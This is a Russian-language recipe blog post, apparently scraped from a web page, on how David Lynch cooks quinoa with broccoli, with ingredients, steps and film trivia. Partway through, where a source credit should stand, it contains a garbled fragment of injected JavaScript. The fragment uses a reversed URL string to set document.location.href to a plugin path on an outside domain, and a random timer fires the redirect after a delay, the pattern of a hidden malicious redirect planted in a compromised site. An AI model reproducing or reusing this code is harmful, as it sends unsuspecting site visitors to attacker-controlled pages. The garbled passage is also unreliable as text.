Кумир миллионов о том, как готовить блюдо на миллион.
blogspot.com
Некогда объяснять: просто наливаем бокал красного вина и ждём. По крайней мере так велит Дэвид Линч — режиссёр «Синего бархата», «Шоссе в никуда», «Малхолланд Драйва» и «Твин Пикса» (как бы между прочим замечаем, что Линч трижды номинировался на «Оскар» в категории «Лучший режиссёр», а его фильм «Дикие сердцем», который мы даже не удосужились упомянуть, выиграл «Золотую пальмовую ветвь»). Если что, мы всё ещё рассказываем, как правильно готовить киноа. Если коротко, то вы пьёте — киноа варится.
Киноа с брокколи
Дэвид Линч: как правильно варить киноа
СЛОЖНОСТЬ РЕЦЕПТА:
ВРЕМЯ ПРИГОТОВЛЕНИЯ:
20 МИНУТ
КОЛИЧЕСТВО ПОРЦИЙ:
не указано
КАЛОРИЙНОСТЬ:
не указана
0 calories
Рецпет с сайта fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru
PT1H
PT1H
Ингредиенты
киноа
1/2 стакана
морская соль
1/4 ч. л.
брокколи
200 г
Кубик овощного бульона
1 шт.
Оливковое масло
1 ст. л.
Жидкие аминокислоты
1 ст. л.
- Возьмите небольшой сотейник с толстым дном и наполните его холодной водой примерно на треть. Добавьте в воду морскую соль и доведите её (воду, не соль) до кипения.
- Высыпьте киноа в сотейник (соотношение воды и киноа должно быть 2:1), закройте его крышкой и уменьшите огонь — вода должна кипеть, но совсем чуть-чуть.
- Через 8 минут в сотейник добавьте брокколи. Варите киноа (теперь уже с брокколи) ещё 9 минут.
- За минуту до готовности раскрошите в сотейник овощной бульонный кубик, хорошо перемешайте (добавлять в блюдо готовые бульонные кубики, конечно, мы не разрешаем никому — разве что Дэвиду Линчу и вам, если вы готовите строго по его рецепту. Так-то лучше воспользоваться домашними кубиками или отказаться от них вовсе).
- Выложите киноа и брокколи в миску. Добавьте немного соевого соуса и оливкового масло. Готово!
- После того как выложите киноа с брокколи, обязательно замочите кастрюлю, а то потом замучаетесь её отмывать.
Кстати, Линч обожает есть киноа на ужин, мы же советуем есть её по утрам: киноа — это источник сложных углеводов. По мнению нашего главного редактора Маши Командной, это самое вкусное и полезное блюдо на свете.
Если мы (или Линч) вам ещё не надоели, советуем целиком посмотреть это видео. Оно здорово снято, к тому же Линч рассказывает свои фирменные истории (от одной из них, про Югославию, кока-колу и заправку, прямо-таки кровь стынет в жилах).
А ВОТ И ВИДЕО, КОТОРОЕ СДЕЛАЛ ЛИНЧ (СНЯТО ОНО, РАЗУМЕЕТСЯ, В Ч/Б)
Если вы тоже любите киноа, попробуйте вот эти рецепты (киноа с брокколи — это, конечно, здорово, но вариантов приготовления этой крупы просто масса):
5 ЛЁГКИХ РЕЦЕПТОВ С КИНОА
И ЕЩЁ 5 РЕЦЕПТОВ С КИНОА (ТОЖЕ НЕСЛОЖНЫХ)
НАКОНЕЦ,10 РЕЦЕПТОВ С КИНОА (КОГДА НАДОЕДЯТ ПРЕДЫДУЩИЕ 10)
Если вам понравилcя этот материал, можете подписаться на нашу страничку в «Фейсбук» или «Вконтакте». С нами вы будете знать, как следить за своим здоровьем, и станете таким красивым, что все вокруг просто обзавидуются.
Наш сочный Instagram — вот по этой ссылке.